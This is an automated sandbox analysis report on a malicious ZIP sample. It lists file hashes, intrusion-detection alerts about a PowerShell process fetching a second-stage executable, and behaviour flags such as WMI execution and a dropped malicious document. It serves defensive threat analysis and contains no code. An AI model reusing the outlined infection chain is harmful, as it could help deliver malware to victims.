PID	Process	Class	Message
2356	POwersheLL.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
2356	POwersheLL.exe	A Network Trojan was detected	AV INFO Suspicious EXE download from WordPress folder
2356	POwersheLL.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2356	POwersheLL.exe	Misc activity	ET INFO EXE - Served Attached HTTP

Add for printing

No debug info

General Info

REP-20201015-B10855.zip

DC95A1A9107A53231EC70BD6C6F319FE

4F3C1021B09D9DF29529DED725AD35D5A56994F9

6B992BC263A77A5E0B88BD628AC596DBF3129282D7D2C23A9B615CCFC1E495C2

1536:voMpZMDEbNxI3vgaP2HcJ6UcQEGAVo3yTW2Q:vTMDEbNIjP2HcJUdo3yTZQ

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Drops known malicious document

Application was dropped or rewritten from another process

SUSPICIOUS

Starts Microsoft Office Application

Executable content was dropped or overwritten

Executed via WMI

Creates files in the user directory

PowerShell script executed

Starts itself from another location

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

ZIP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings